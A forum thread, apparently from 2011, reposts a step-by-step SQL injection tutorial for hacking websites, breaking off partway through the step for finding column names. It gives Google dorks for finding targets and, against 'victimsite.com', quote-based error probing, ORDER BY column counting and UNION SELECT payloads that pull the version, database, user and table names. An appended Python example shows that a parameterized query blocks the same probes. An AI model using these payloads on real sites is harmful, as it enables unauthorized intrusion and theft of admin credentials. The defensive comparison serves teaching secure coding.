Technology Meeting Points Forum
Website and Forum Hacking

Please read this first

Post  Delete Thu May 12, 2011 11:29 am

Members, when you post a topic, please clearly post content that relates to its title.
Delete
Forum moderator

Posts : 10
Registration date : 2011-04-19
Age : 40
Country of residence : myanmar

Website and Forum Hacking

Post  Delete Thu May 12, 2011 1:07 pm

CREDIT BY MMSO.ORG
This is posted only for those who want to learn.

[url=http://www.mmso.org/home/showthread.php/6398-Hacking-website-using-SQL-Injection-step-by-step-guide]Hacking website using SQL Injection - step by step guide[/url]

Before we see what SQL Injection is, we should know what SQL and Database are.

[b]Database:[/b]
A database is a collection of data. From a website's point of view, a database is used for storing user IDs, passwords, web page details and more.

[b]Some databases are:[/b]

* DB servers,
* MySQL (open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* PostgreSQL (open source),
* SQLite,

[b]SQL:[/b]
Structured Query Language is known as SQL. In order to communicate with the database, we use SQL queries. We are querying the database, so it is called a query language.
Some Examples:

Code:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
Code:
http://www.ziddu.com/download/13161874/A...t.zip.html


[b]How to use?[/b]

Copy one of the above commands and paste it in the Google search engine box.

Hit enter.

You can get a list of websites.

We have to visit the websites one by one to check for the vulnerability.

So start from the first website.

[img]http://1.bp.blogspot.com/_Bgs5mP8GXd8/TRnE45Qv1KI/AAAAAAAAACU/7jkUFr61Owo/s500/Sql+Injection+1+copy.jpg[/img]



Note: if you like to hack a particular website, then try this:

site:www.victimsite.com dork_list_commands

For eg:

site:www.victimsite.com inurl:index.php?id=

[b]Step 2: Checking the Vulnerability:[/b]

Now we should check the vulnerability of websites. In order to check the vulnerability, add a single quote (') at the end of the URL and hit enter. (No space between the number and the single quote.)

For eg:
Code:
http://www.victimsite.com/index.php?id=2'

If the page remains the same, or shows that the page is not found, or shows some other webpage, then it is not vulnerable.

If it shows any error which is related to the SQL query, then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
[b]Step 3: Finding Number of columns:[/b]
Now we have found that the website is vulnerable. The next step is to find the number of columns in the table.
For that, replace the single quote (') with an "order by n" statement. (Leave one space between the number and the order by n statement.)

Change n from 1,2,3,4,5,6,...n until you get an error like "unknown column".

For eg:
Code:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

Change the number until you get the error "unknown column".

If you get the error while trying the "x"th number, then the number of columns is "x-1".

I mean:
Code:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
So now x=8. The number of columns is x-1, i.e. 7.

Sometimes the above may not work. In that case, add "--" at the end of the statement.
For eg:
Code:
http://www.victimsite.com/index.php?id=2 order by 1--

[b]Step 4: Displaying the Vulnerable columns:[/b]
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement, and change the id value to negative (I mean id=-2; it must be changed, but on some websites it may work without changing).

Replace the columns_sequence with the numbers from 1 to x-1 (number of columns), separated with commas (,).

For eg:
If the number of columns is 7, then the query is as follows:
Code:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working, then try this:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page (they must be less than the 'x' value, I mean less than or equal to the number of columns).

Like this:

[img]http://3.bp.blogspot.com/_Bgs5mP8GXd8/TRnSNLFkz-I/AAAAAAAAACg/gxcL4v9j-Aw/s1600/Sql+Injection+2.JPG[/img]
Now select one number.
It is showing 3 and 7.
Let's take the number 3.

[b]Step 5: Finding version, database, user[/b]
Now replace the 3 in the query with "version()".

For eg:

Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3, something like this.

Replace version() with database() and user() to find the database and user respectively.

For eg:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

[b]Step 6: Finding the Table Name[/b]
Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".

For eg:

Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will show the list of table names. Find the table name which is related to the admin or user.

[img]http://2.bp.blogspot.com/_Bgs5mP8GXd8/TRnVpPHS26I/AAAAAAAAACk/IhsV7_icXr0/s1600/Sql+Injection+3.JPG[/img]

Now select the "admin" table.


[b]Step 7: Finding the Column Name[/b]

Now replace the "group_concat(table_name)" with the "group_concat(column_name)".

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.

Find MysqlChar() for Tablename:
First of all, install the HackBar addon:

Code: [url=https://addons.mozilla.org/en-US/firefox/addon/3899/]https://addons.mozilla.org/en-US/firefox/addon/3899/[/url] [img]https://2img.net/u/1813/30/78/37/smiles/161578.gif[/img] [img]https://2img.net/u/1813/30/78/37/smiles/962543.gif[/img]
Delete
Forum moderator

Posts : 10
Registration date : 2011-04-19
Age : 40
Country of residence : myanmar
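
The requests in steps 2 to 4 of the post above only have an effect when the page builds its query by concatenating the id parameter into the SQL text. As an added example (not part of the original post; it uses Python's sqlite3 in place of the PHP/MySQL site the post assumes, with a constructed 7-column articles table and hypothetical function names), the same inputs are run against a concatenated query and against a validated, parameterized one:

```python
import sqlite3

def make_db():
    # Constructed sample data: a 7-column table, matching the post's example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
               " author TEXT, created TEXT, views INTEGER, tags TEXT)")
    db.execute("INSERT INTO articles VALUES"
               " (2, 'Hello', 'Body', 'ann', '2011-05-12', 10, 'news')")
    return db

def fetch_vulnerable(db, raw_id):
    # Before: the id parameter is concatenated into the SQL text, so anything
    # after the number is parsed as SQL (assumed behaviour of index.php?id=).
    return db.execute("SELECT * FROM articles WHERE id = " + raw_id).fetchall()

def fetch_hardened(db, raw_id):
    # After: validate the type first, then bind the value as a parameter.
    # The value never becomes part of the SQL text.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return db.execute("SELECT * FROM articles WHERE id = ?", (int(raw_id),)).fetchall()

# The id values used in steps 2-4 of the post, plus one legitimate request.
PROBES = ["2", "2'", "2 order by 8", "-2 and 1=2 union select 1,2,3,4,5,6,7--"]

def run(fetch):
    db = make_db()
    results = {}
    for probe in PROBES:
        try:
            results[probe] = fetch(db, probe)
        except sqlite3.Error as exc:
            # A real application logs this server-side and returns a generic
            # error page; echoing the database error is what step 2 relies on.
            results[probe] = "SQL error: " + str(exc)
        except ValueError as exc:
            results[probe] = "rejected: " + str(exc)
    return results

if __name__ == "__main__":
    for name, fetch in (("vulnerable", fetch_vulnerable), ("hardened", fetch_hardened)):
        print(name)
        for probe, outcome in run(fetch).items():
            print("  %r -> %s" % (probe, outcome))
```

In the vulnerable variant the quote and the out-of-range order by surface as database errors and the union select returns an attacker-chosen row; in the hardened variant only the plain integer reaches the database.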
